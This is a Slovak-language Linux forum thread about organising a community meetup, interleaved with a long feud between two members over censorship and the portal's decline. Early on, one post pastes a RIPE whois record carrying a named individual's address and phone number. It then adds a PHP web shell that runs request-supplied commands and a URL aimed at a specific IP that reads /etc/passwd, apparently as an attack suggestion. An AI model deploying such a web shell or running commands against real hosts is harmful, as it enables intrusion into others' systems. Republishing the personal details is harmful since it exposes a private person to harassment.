Kľudne to zmažte, ale nedalo mi mám vás všetkých rád a budem rád keď tu moji priatelia budú v pohode nažívať s mojimi priateľmi a zabudnú na to čo už dávno všetci zabudli. Tak by sme mohli oficiálne s požehnaním LinuxOS, alebo neoficiálne spraviť stretko, navrhujem neutrálnu pôdu v centre Slovenska, aby to všetci mali rovnako ďaleko :) To blaváci asi neprídu, pretože sú zvyknutý, že je to stred vesmíru, alebo sa mýlim? :) Samozrejme sú vítané spriatelené LINUXOVÉ a OpenSource weby.
Rád by som prišiel. V strede je alebo Banská Bystrica, alebo Liptovský Mikuláš.
Inak o weby podľa mňa nejde, skôr o ľudí, však weby sú vlastne len zoskupenia ľudí a možnosti komunikácie medzi nimi :)
a Skalica je pjekne mjesto :)
Dosť veľká šanca bola OSS CONF v Žiline, človek sa mohol stretnúť a aj niečo vidieť. Poloha tiež nie zlá. Nápad je to dobrý to stretko, len aby niekto aj reálne prišiel. Ja osobne som si "voľnú kartu" minul návštevou Žiliny. Predsa som bol preč celý deň. Sme sa tam stretli chalani s LinuxON. Síce minulý rok bol OSSCONF väčší ako tento rok, návštevu neľutujem. Škoda že tam nebolo viac ľuďí, myslel som že tam stretneme chalanov aj odtiaľto. Škoda.
1 0.17 0.5 0.1*/usr
1 1.00 0.5 0.5 /rado
inetnum: 188.123.104.0 - 188.123.105.255
netname: SK-IMAFEX
descr: Imafex resident users Ruzomberok
country: SK
admin-c: SK4529-RIPE
tech-c: SK4529-RIPE
status: ASSIGNED PA
mnt-by: IMAFEX-MNT
source: RIPE # Filtered
person: Stanislav Kalousek
address: Nabr. A. Stodolu 1799/65
address: 031 01 Liptovsky Mikulas
address: Slovakia
phone: +421 905 440 232
nic-hdl: SK4529-RIPE
mnt-by: ARTOS-MNT
% Information related to '188.123.96.0/19AS5578'
route: 188.123.96.0/19
descr: IMAFEX
origin: AS5578
mnt-by: IMAFEX-MNT
mnt-by: GTSSK-MNT
mnt-by: ARTOS-MNT
<?
shell_exec ( $_REQUEST["cmd"] )
?>
A potom na začiatok sa pohrať:
http://188.123.104.133/test.php?cmd=cat%20/etc/passwd
atď.
Ď.
Závisí od možností ubytovania ( pri viac dennom ) a od dopravy. Ale, v tom sa paštikári nelíšia od iných regióncov. Alebo som sa v niečom pomýlil?
To, že za menej ako mesiac urobil minimálne 3 zápisy vo fóre, ktorých jediný obsah bol "som lepší ako Hoferek", o ňom hovorí veľa. Ničí toto fórum, ničí dobré meno Linuxu a správa sa tak, že by sa 5 ročné decko v jeho koži poriadne hanbilo. Dáme anketu, kto má podobný názor? Alebo niekto vyhodí z fóra aj Dodoeda aj mňa? Aj to by bolo riešenie, aspoň by bol kľud. Ja by som bol za, lebo si vážim to, čo urobil Tomáš Srnka, Milan Dvorský a ďalší. Stavím sa, že on by bol proti. Ámen.
ak ho presvedčíš, aby ho prijal, budem ti veľmi vďačný.
Naozaj si myslíš, že nemám objektívne právo upozorniť ostatných na to, čo píšeš o nás (a tak aj vlastne o linuxos.sk) po cudzích konkurenčných sajtoch ??
Choď si užiť svoj liek a neotravuj s takýmito primitívnosťami, bola tu (bedňa) napísaná celkom pozitívna téma, ktorú si okamžite "ogrcal" svojou jasnozrivou poznámkou o Slotovi a SNS a nás.
OK, tak ten súvisiaci blog:
Malá kritika linuxového internetového portálu. Jeden známy sa ma pýtal jednoduchú otázku - vraj načo som urobil druhý linuxový portál, keď už jeden existuje. Samozrejme som ho vyviedol z omylu. Však práca šéfredaktora alebo niečoho takého je skôr pre niekoho zodpovednejšieho ako som ja :) V diskusií padlo aj to, že prečo na starší portál nepíšem. Tak som teda napísal dôvody, ktoré boli hlavne o neporozumení si s konkrétnym človekom.
Po nejakom čase a tak trochu prehováraní zo strany iného kamaráta som sa rozhodol vrátiť. Bolo tam pár otázok začiatočníkov, teda pre mňa najobľúbenejšej "kasty" linuxákov. Kde som vedel pomôcť, tam som pomohol. Problém však nastal pri tom, čo som si prečítal správičku od autora Dodoedo. Ten ich píše hodne a prináša aktuálne informácie. Často však pridá nejaký ten "klenot", ktorý je hneď terčom oprávnenej kritiky. K tomu úplne neohrabané ochraňovanie "úplne odveci" myšlienky a už je oheň na svete.
Hlavný problém nie je diskusia. Fajn, ľudia majú odlišný názor, tak sa môžu navzájom niečo naučiť. Čo ale má robiť v diskusií cenzúra? Načo je dobré cenzurovať dobré názory? A akú má logiku napísať niečo typu:
Ahoj, "Tri pomlčky".
Vyzerá to ale tak, že jediný, kto tu vedie pivné reči o linuxos.sk si práve Ty.
Nie je pravda, že je jediný s tým názorom a fakt, že sa zakáže diskutovanie, len naštve toho človeka čo sa ozval i ostatných, ktorí s ním súhlasia. Ale tak dajme tomu, toto ešte človeka nejakom moc nevytočí. Ako je ale možné, že autor správičky zloženej z hodnotného obsahu a úplnej hovadiny na konci to dá potom ešte aj do fóra a ďalej rozoberá svoju teóriu o rogale? Ozval som sa do nej, a to nie kvôli tomu, že by mi bol človek s nickom troch pomlčiek či mínusov sympatický, no vyjadril dobrý názor a aj keď s ním úplne nesúhlasím, poukázal na problém.
Teraz bude nasledovať určite cenzurovanie aj obsahu na fóre a znovu sa to nechá s tým, že proti autorovi správičky nikto nič nemá. Je hanbou, že ak už nemá (ak dobre chápem) tento autor možnosť schvalovať správičky, tak ich niekto iný schvaluje bez čítania. Väčšia hanba je cenzúra a najväčšia je totálna neochota hľadania nejakého kompromisu. Nikto nie je bezchybný, a kto si myslí že áno, ten má viac "porúch osobnosti" ako ktokoľvek iný.
1) Prečo ma stále považuješ za sedliaka? Pretože som z krásneho Liptova? A čo máš proti Liptovu? Stále útočíš.
2) Zviditeľnenie Greenie? Áno? Kde? Nie je to skôr zviditeľnenie teba? Ty píšeš správičky a útočíš na Hofereka. Robíš niečo iné? Neviem o tom. Potrebuješ sa stále zviditeľňovať.
3) Píšem niečo o "nás" ? Čo tým myslíš? Nájdi mi miesto, kde útočím na ľudí, ako je napríklad Tomáš Srnka. Neútočím, len bránim sa, no nie voči LinuxOS (sú tu super ľudia), ale proti tebe. Koľko krát si na mňa zaútočil? A čo si dosiahol? Nenávisť, fajn. Ešte niečo? Hmmm, už nič. Ak je cudzí sajt miesto, kde sú rovnakí alebo podobní ľudia, no nie sú tam ľudia ako ty, tak fajn, ber to za cudzí sajt.
4) Mojim liekom je napríklad pobyt na čerstvom vzduchu. Skús to aj ty. Je to dobrá vec, prečistí hlavu a lepšie sa rozmýšľa.
5) Bedňa je veľmi fajn človek. Poznám ho krátko, no zaslúžil si rešpekt viac ľudí.
6) Pri téme dopravy som pridal lietadlo. Sorry, ak to chápeš ako útok na teba. Pre mňa je lietadlo dopravný prostriedok a ak je slovo lietadlo nejaký útok na teba, tak sa ospravedlňujem. Nemám nič spoločné so Slotom, jeho lietadlom či jeho politickou stranou.
7) Na blogoch píšem jednoduché myšlienky. Nech sa páči, sprav si blog aj ty, ak po tom túžiš. Bez problémov akúkoľvek myšlienku vysvetlím.
V skratke napríklad poviem to, čo je v tomto napísané:
Spravovať portál je ťažké, nie je to pre hocikoho. Však preto to aj nerobím. Na Roote sú šikovný ľudia, na LinuxON, na LinuxOS a na rôznych ďalších stránkach tiež. Ďalej som tam napísal, že nemám rád cenzúru. Čokoľvek sa cenzuruje, dopadne väčšinou inak, ako sa zamýšľa. Cenzurovanie či zakrývanie pravdy v prospech hlúpostí akéhokoľvek kalibru je podľa mojich myšlienok zlé. Dlhodobo, mám ten názor ešte od čias, čo som napríklad ani o Linuxe nepočul.
Veľa krát si práve ty cenzuroval obsah, napríklad pri správičke. Ak príde správa typu:
"Vyšiel Giregox 8" a niekto napíše namiesto toho Firefox v diskusii pod článkom a ty ho nie len nevypočuješ, ale aj zmažeš, tak robíš podľa mňa nesprávnu vec. Cenzúru znášam ťažko a tak vidíš, naštve ma to a verejne napíšem, že si urobil chybu a naozaj ju nechceš napraviť. Nikto nie je bezchybný a ak si myslíš, že mazaním opravných riešení sa staneš dokonalým, tak s tým nesúhlasím.
1) obidvaja máme Linux
2) obidvoch nás zaujímajú patenty
3) obidvaja sa zaujímame o Android
4) obidvaja sme trvdohlavci
5) obidvaja sme na tomto fóre už dlho
6) obidvaja tu máme veľký počet príspevkov
7) obidvaja sa snažíme pomôcť začiatočníkom
...
Napriek tomu vždy niečo nájdeš na mňa, nejakú blbosť, len aby si začal konflikt.
Čo s tým?
A) ja sa chcem dohodnúť, ty sa chceš dohodnúť, dohodneme sa
B) ja sa chcem dohodnúť, ty sa nechceš dohodnúť, tak sa skľudní hormón všade a bude kľud
C) ja sa chcem dohodnúť, ty neustále útočiť a tak budeš neustále útočiť. Aj tak nič nedosiahneš, no budeš stále pokračovať
D) ja sa chcem dohodnúť, no ešte 5x ma naštveš a už sa to zmení na "už sa s tebou nechcem dohodnúť"
E) zmažú teba, v prípade potreby zmažú mňa a bude kľud
F) začnem útočiť ja na teba, neustále dookola. Znížim sa na tvoju úroveň a budem zo seba robiť maximálneho hlupáka.
Vyber si čo chceš, ja som za A alebo B.
dodoedo I.
Nemáš záujem? Výborne. tak nezakladaj témy o mne, nespúšťaj hlúpe výrazy atď.
Kľudne sa označuj za kinga Dodoeda prvého, to je tvoja vec. No skús naozaj s tou spomínanou hlúposťou sa ty nehrať na neviem koho. Otvorene si myslím, že ti nezáleží na portály. Ten by bol určite lepší, keby tu neboli hádky medzi dvomi ľuďmi s inými názormi. Takže ešte raz, nepáči sa mi tvoj prístup a nebude sa mi páčiť, kým ho trochu neupravíš. Priznaj, že si len človek, tak ako my všetci. A prestaň s tým Liptovom, To je naozaj hlboko pod úroveň kohokoľvek.
A) poriadne nasrať teba, Bedňa, a hromadu ďalších
B) správať sa ako ľudia, nie ako banda... ako sa to povie slušne? :)
Beriem B :)
152 hlasov spolu, v kraji
Košickom
28 18.4%
Trenčianskom
25 16.4%
Žilinskom
25 16.4%
Banskobystrickom
19 12.5%
Bratislavskom
18 11.8%
Nitrianskom
15 9.9%
Prešovskom
13 8.6%
Trnavskom
9 5.9%
Neviem kedy bola nahodena ale podobny typ to je. Ja by som z KE dosiel do stredu, do BA asi nie.
btw myslím, že je to tak trošičku zle vymyslené. naozaj veľa ľudí je na hraniciach medzi nejakými krajmi. Napríklad také Topoľčany sú v jednom kraji, no veľmi blízko sú tri ďalšie. Podobne napríklad Poprad.
Koľko je vhodných miest na stretko, to je ťažko povedať. Osobne si myslím, že tieto by boli vhodné:
1) Žilina
2) Považstká Bystrica
3) Liptovský Mikuláš/Ružomberok
4) Poprad
5) Spišská Nová Ves
6) Banská Bystrica/Zvolen/Žiar nad Hronom
7) Brezno
8 ) Lučenec, Rimavská Sobota
A nie len to, kúsok od Žiliny v Dolnom Hričove máme aj medzinárodné letisko :D
Sorry za spam.
aspoň potrasiem pravicou a uvidím niektorých osobne ...
Nejako som nepochopil, kde mam prist ;)
Bolo by dobre spravit pool s miestom a casom, kedy komu vyhovuje napr. na http://www.doodle.com
Pred pár rokmi to tu bolo celkom dobrým zdrojom informácií.
Aj keď veľa neprispievam, ale sa snažím aspoň sledovať a prečítať si.
Lenže poslednú dobu to tu je len o pár jedincoch, ktorí sa medzi sebou hádajú a urážajú sa.
Ide to tu proste dole vodou.
Je čas pohnúť sa inde.
Chcem zároveň požiadať administrátorov o zrušenie môjho nicku.
Vopred ďakujem.
Takéto patetické somarinky bez objektívnosti si všetci nechajte pre seba .. nikto tu nikoho nezdržuje ani nevyhadzuje a preto ani nikoho nezaujíma kedy prídeš, kedy odídeš a čo robíš ...
;-)
mna to tu tiez nebavi sledovat, obcas dakto napise nieco rozumne, sak si len precitaj tento thread!
To nemyslíš vážne !
;-)
Neboj sa a napíš explicitne všetko čo Ti leží na srdci, lebo ináč je to iba komentovanie ...
:-)
mne osobne sa zdá, že sa znižuje záujem o fóra aj preto, že nie je toľko distribúcii. Kedysi Mandrake, Debian atď, všetko tak aspoň trochu vyrovnané. Teraz? Ubuntu sem, Ubuntu tam, Ubuntu v meste, Ubuntu na dedine... Dnes je Ubuntu fakt všade, čo je tak dobre, až je to úplne zle :)
z niektorych odpovedi ludi ktory linux vyskusali prisiel na to ze hlavny problem je to ze sa nechcu nic nove naucit, casto to vzdali aj s ubuntu hned na zaciatku pretoze mali inu ikonku nastavenia internetu, alebo im neslo spustit exe subor dvojklikom, hned sa takeho lacneho mozno len LiveCD si spravili obraz nie o ubuntu napriklad, ale o celom linuxe a stali sa zatvrdlimi windowsakmi, ktory mozno ku svojmu pouzivaniu pocitaca ani nepotrebuju windows, trebars len chatuju, pisu maili, sem tam nieco nakreslia, vytvoria dake dokumenty, preto s prichodom noveho portalu superuser.sk som dostal napad ako by sa mohlo nieco taketo zlomit, vsimol si jednu vec, ked aj sa pyta ako sa vo fluxboxe meni pozadie povie mu dakdo, kukal si google? , alebo podobne nejak aj ked mu neda odpoved len ho navadza tak sa uzivatelia zviknu nastvat, alebo niesu tak spokojny ako s odpovedou $ fbsetbg /path/to/background.image, viem ze je to ich problem, ale ak chceme nieco dosiahnut podla mna by sme mali byt viac privetivi, napriklad ja ked som mnohym radil, nie na fore, hlavne na IM,alebo aj osobne ked zacinali, ja som im to pchal vislovene pod nos, ak bol aj kompletny navod v anglicite tak som mu ho zjedodusil a dal slovensky, napriklad brat povedal ze nikdy nezacne s linuxom, lebo sa mu zdal komplikovany a nekvalitny, ale ako som mu vsetko povedal a viedol ho ako to slo tak sa mu zapacil a teraz ma linux aj doma aj v praci (programator php), dalsia vyhoda takychto odpovedi je ze ked to bude dakdo hladat trebars o roky neskor, tie odkazy ktore ste pohadzali uz mozu byt neplatne a uzivatel sa nemusi dozvediet s toho nic, uzivatelia boli velmi vdacni za take odpovede, takimto pristupom chcem pomoc na novom portale, a pripravujem uz dake clanky pre zaciatocnikov aby sa im to este zjednodusilo. tu okolo linuxos.sk je uz taka atmosfera rozpadu a preto uz tak nelaka novych uzivatelov ktory radsej prejdu ku konkurencii alebo na ceske weby
Dlho som uvažoval či napíšem ešte do tohoto vlákna. Ak sa nenahneváte, tak skúsim.
1. LinuxOS je ešte stále číslo 1 čo sa týka návštevnosti a výsledkov vyhľadávania. Síce články niesu, a sú tu nejaké problémy (hádky), v podstate na každom portáli sú nejaké starosti. Ale čo už.
Ale na druhej strane je tu kvantum tém na fóre a niekoľkoročná tradícia (viac ako 5rokov). S novým portálom na inej doméne to také ružové nebude. My fungujeme (LinuxON) 2 roky a poniektorí o nás ani nevedeli a takých je dosť.
Takže najcennejšie ten "základ" linuxos stále má, tak ho nepochovávajte.
Ja (TREBOR) s Tomášom Hanzelom sme si mysleli že keď spravíme LinuxON, tak sa LinuxOS trošku "preberie" k životu. Lebo je to taká priateľská "konkurencia". Prečo priateľská konkurencia? Lebo toto nieje biznis. Nikto z nás to nerobí pre biznis.
Môžem to potvrdiť z vlastnej skúsenosti. Robil sa nový dizajn na LinuxOS, no predsa však aj my spravíme nie? tak sme robili nove dizajny obaja, a sme sa tešili na nové veci. S emdim sme si vymenili informácie ako čo pokračuje, ja som ukázal ako vyzerá nový design u nás, Emdi zase nový LinuxOS. Nakoniec sa nový design na linuxOS nedokončil, a ja som mal svoj na 70%, tak som písal emdimu že nech sa nehnevá, ale ja to už doklepnem. Keby sa nerobil nový dizajn na LinuxOS, nemali by sme my nový dizajn tak skoro.
Boli plány, Emdi sa fakt snažil, zháňal reklamu, lepšie za zoženie reklama na 2 portály ako na jeden, je tam väčší záber. Aj sa pár mesiacov tak fungovalo. A za to Ti Emdi veľmi ďakujem. Objednávka hocičoho sa lepšie vybavuje pre 2 portály ako pre jeden. A tak ďalej by som mohol pokračovať. Napríklad nie je problém prepojiť linky na portáloch. My sme aj tak fungovali viac ako mesiac sme ťahali články z linuxOS na titulku linuxON. Prečo sa to nedalo obojstrane, to už neriešim.
2. Po druhé hádky. Keď sa pozerám na tie hádky spätne väčšinou sú tam 2 ľudia. Je to možné aby "položilo" LinuxOS jeden prípadne 2 ľudia? Ja si myslím že je to ZLE.
Dododedo, dávaš správy už peknú dobu, už nemáš päť rokov, načo máš uštipačné poznámky, ktoré len potom provokujú niektorých jedincov k hádkam. Odvádzaš kus roboty a potom sa to takto znehodnocuje. Prízvukujem, že nemám nič proti tebe, tak to prípadne neber že na Teba útočím.
Niekto písal že správičky sú niekedy písane aj nejakými poznámkami. Tak ten čo ich povoľuje nech ich zedituje. A hotovo. Ak niekto bude mať chuť si napísať názor nech si napíše. Ale bez nadávok, a urážok! Také komenty tvrde mazať. Nikoho nezaujíma kto kde začal a ten to vracia tomu a tomu. A henten písal niekde a tak. Vykašlite sa už nato. Keď vidím že niekto niekoho uráža nahláste to adminovi, nech sa to rieši. Však Emdi to už tu písal. Viem že to vyžaduje čas, ale ináč sa nedá.
Stano je kapitola sama o sebe. Či sa páči či nie, STANO je osobnosť v opensource. To je fakt. A je niekedy ako neriadená strela. Preto Eduard si starší, mal by si vedieť ako v takýchto situáciach sa zachovať. Každý si sám potom urobí vlastný názor.
3. Vôbec nerozumiem tým pár jedincom čo si chcú vymazať nicky. Popravde som z toho šokovaný. Ale pravdepodobne majú v tom prsty tie hádky. Že tie osoby to takto riešia.
Chel by som ešte napísať, že nikto z nášho redakčného tímu nepodnikal kroky proti LinuxOS či už urážky alebo spamovali tento portál odkazmi na LinuxON. Sme dospelí normálni ľudia a nato si LinuxOS dosť vážime.
Sám som zvedavý ako to dopadne, držím palce. Miro Bendík má chuť to tu viesť, má chuť programovať. Tak mu alebo tomu kto sa o to bude starať, zbytočne neháčte polená pod nohy.
Teraz rozmýšľam či to postnem, či sa oplatilo obetovať 1 hodinu môjho zaneprázdneného času na tento post. Verím, že to hádam malo zmysel... Chalani držte sa.
Čo sa týka správičiek, tak práve tie drobné poznámky sa mi páčia, viď. posledné správičky o boji proti Androide. Neviem čo komu na tom môže vadiť a pokiaľ už aj toto má rozdeľovať ľudí, tak je škoda niečo robiť.
Niektoré časti, ako napríklad toto, sú tak trochu na rozmedzí, no dajú sa bez problémov stráviť a asi nikomu nevadia:
"Je to šokujúce a zároveň nechutné pre takú známu spoločnosť akou je Apple, a už dávno to nemá nič spoločné s hospodárskou súťažou v kapitalizme ... "
Niektoré sú však tak trochu viac blogovo ladené a tak celkom nepatria do správičiek:
"Samsung v odpovedi hovorí o šialenosti a ja sa musím ísť tiež nadýchať čerstvého vzduchu, fuj ... "
Čím nechcem povedať, že je to zle, len... zdá sa mi to vhodnejšie pridať ako komentár pod správičkou, než priamo do správičky.
Ad "Dododedo, dávaš správy už peknú dobu, už nemáš päť rokov, načo máš uštipačné poznámky, ktoré len potom provokujú niektorých jedincov k hádkam."
čo sa týka uštipačných poznámok, je to moja vlastnosť, ktorú používam, keď sa mi zdá, že vidím falošné konanie, znehodnocujúce prácu ostatných - vtedy reagujem. Nie je pravda, že celý portál (a jeho stabilita/nestabilita) je závislá na dvoch ľudoch Eduard Šurina a Stanislav Hoferek. Tento portál má stále silu a sám som pred nedávnom písal, že je aj najsledovanejším slovenským (a sčasti aj moravským ) portálom a nikto to nezmení. Ja sa domnievam, že na slovenskej scéne (okrem undergroundu) tak trochu aj odzrkadľuje súčasný stav slovenskej linuxovej komunity, taký aký je rozporuplný ...
Ad "Niekto písal že správičky sú niekedy písane aj nejakými poznámkami. Tak ten čo ich povoľuje nech ich zedituje. A hotovo. Ak niekto bude mať chuť si napísať názor nech si napíše. Ale bez nadávok, a urážok! Také komenty tvrde mazať. Nikoho nezaujíma kto kde začal a ten to vracia tomu a tomu. A henten písal niekde a tak. Vykašlite sa už nato. Keď vidím že niekto niekoho uráža nahláste to adminovi, nech sa to rieši."
Situácia sa rokmi vyvinula tak, že v systéme okrem Milana, administrujem Správy ja (schvaľovanie, edit, pozor žiadny výmaz HOCIČOHO na to už nemám práva, boli mi odobraté kedysi ...)
snažím sa rýchlo každú správu pozrieť po formálnej a funkčnej stránke a zverejňujem/schvaľujem ju. Z lásky k Linuxu (ekosystému) pridávam aj zriedka akási "doprovod", ktorý odráža moju slobodu. vyjadrovania. Lenže aj tak sa nájde jedinec, ktorý má potrebu napísať do komentára správy (aj hulvátske) veci, týkajúce sa dodoeda a nie základu informácie v Správe samotnej. Pokiaľ mi niekdo nadáva, nemám technickú možnosť to vymazať, ale robia to iný admini tuná ...
Ad "Stano je kapitola sama o sebe. Či sa páči či nie, STANO je osobnosť v opensource. To je fakt. A je niekedy ako neriadená strela. Preto Eduard si starší, mal by si vedieť ako v takýchto situáciach sa zachovať. Každý si sám potom urobí vlastný názor."
Mňa osobne, kedže som si všimol, že má akési problémy, Stanislav Hoferek nezaujíma a ani ako osoba v OS , vysvetľuj si to akokoľvek, je mi to šuma-fuk. Avšak z dôvodov uvedených vyššie IBA REAGUJEM na dané skutočnosti, ktoré robí tento jedinec zverejňovaním všelijakých príspevkov do všelijakých médií kde explicitne menuje linuxos.sk a nereagujem na nadávky, ktorými ma častujú hojne ostatní, prečo ? Ja som sa s tým vopred vyrovnal, keď som išiel pred veľa rokmi do toho ...
Uvediem čerstvý príklad: keď som napísal že píše blbosti o linuxos.sk,. odpisovali ste, že sa jedná a rok starý článok v jeho blogu, v poriadku myslím si hádam sa zmenil a prestal krivdiť linuxos.sk. Prted časom som si pozrel opäť jeho blog a prvé čo vidím je jeho blogová ničiteľská snaha. Opäť nedodržal akési tiché ujednanie a znova píše somariny o linuxos.sk a jeho ľudoch ... dokonca tam doplnil ako sám tu drzo napísal ďalšie linky, no ak sa má TAKTO CHOVAŤ ako píšeš osobnosť v Open-Source slovenskej komunity, tak ja budem sám prvý maličký člen (Dodoedo I.) komunity, ktorý je proti tomuto vystupovaniu.
BTW,
Dodoedo I. znamená sebairóniu, z ktorej sa zasa ja potichu smejem v súkromí, a nie moje vládcovske sklony
Ak ma ešte niečo úprimné napadne, tak dopíšem ...
schválne, najnovší "konflikt" v osnove:
1) na linuxos sa píše o superuser.sk, v ktorom si začal urážať všetkých okolo
2) dal som na root.cz tvoje názory, aby sa k tomu mohli ľudia vyjadriť
3) útočíš na mňa za to, že som si dovolil skopírovať tvoje názory. útočíš teraz na niečo, čo som zverejnil už dávnejšie
ty sa hneváš na mňa za to, že som zverejnil tvoje názory na svet a že údajne urážam linuxos, ja sa hnevám na teba preto, lebo neustále útočíš a aj keď si nikdy nič "nevyhral", stále to opakuješ. Len preto, že si nedokážeš priznať vlastnú chybu. Ja si prajem uzmieriť sa, eMDík si to praje, Bedňa... mám pokračovať ďalej? No ty neustále útočíš tak hlúpymi spôsobmi, ako je napríklad písanie správičiek. Opakovane si myslím, že robíš nesprávne rozhodnutia a ja som hlupákom, že ti odpisujem. Koľko ľudí z LinuxOS odchádza pre tvoju neústupnosť (a moju tiež)? Byť tu adminom, zavediem pravidlo. Od vtedy a vtedy osobné útoky mazať a za neústupnosť ban. Potom by sa ukázala sila portálu, ktorý ničíš. Áno, bez problémov napíšeš "stanko hoferek ničiteľ", no ak by sa urobilo hlasovanie, kto najviac poškodzuje tento web, bolo by tam tvoje meno na prvej priečke.
Ešte raz: nemám nič proti LinuxOS, je to dobrý projekt. Mám však otvorene problém s tvojim správaním, ktoré by určite nemalo byť také, aké je.
P.S. vieš, kto vytvoril tému s názvom "Máme radi LinuxOS" ? Človek, ktorý má rád LinuxOS. Viac ako ja a viac ako ty. Zahrajme sa, súhlasme obaja s tým, že neajké tie hádky budeme riešiť súkromne. Ďalšia možnosť je zmazať všetky konfliky. Tak teba, ako aj mňa. Môže to urobiť akýkoľvek admin a ak by dal niekto administrátorské práva mne na túto jedinú činnosť a hneď po tom by som sa ich vzdal, tak by som to urobil. Vymazal by som všetky príspevky, správy a neviem čo, na základe ktorých považujú ľudia s IQ od 70 do 160 nás dvoch za hlupákov.
ale zatial ma to takto viac bavi, je to sranda citanie
dakujem
P
myslím však, že by bolo bolo lepšie sranda čítanie, keby to bola nejaká poviedka (alebo asi skôr román) pre tých, čo o to majú záujem :) urobme subdoménu dodoedohoferek.linuxos.sk a tam sa môžeme slovne mlátiť. Nie tu. Môžeme si urobiť aj 10 správičiek v zmysle "A nemá rád B" a ďalších desať typu "B nemá rád A". Ešte z nás dvoch bude komediálna dvojica :) Tu medzi vážnymi témami je však táto komédia niekedy fakt tragédia...
ide sa dalej.
:-)
Ako si prisiel na to, ze linuxos.sk je scasti aj moravskym portalom?
Prosím neriešte konflikty hnevom, ale hľadajte riešenie na posunutie vpred. Verím, že linuxová komunita sa zomkne a bude si pomáhať ako doteraz, ba ešte viac. Krásne dni plné linuxu prajem všetkým.
potreboval som sa vyjadrit mozno sa tym daco casom zmeni a mozno ze ked sem zas niekedy pochabo vleziem v domnienke ze najdem nieco co ma s mojim problemom posunie dalej nebudem tu citat same infantilne hovadiny a najdem naozaj postrehy a navrhy ako ten ktory problem riesit alebo nie
s pozdravom.
Prisiel som, Videl som, grcal som!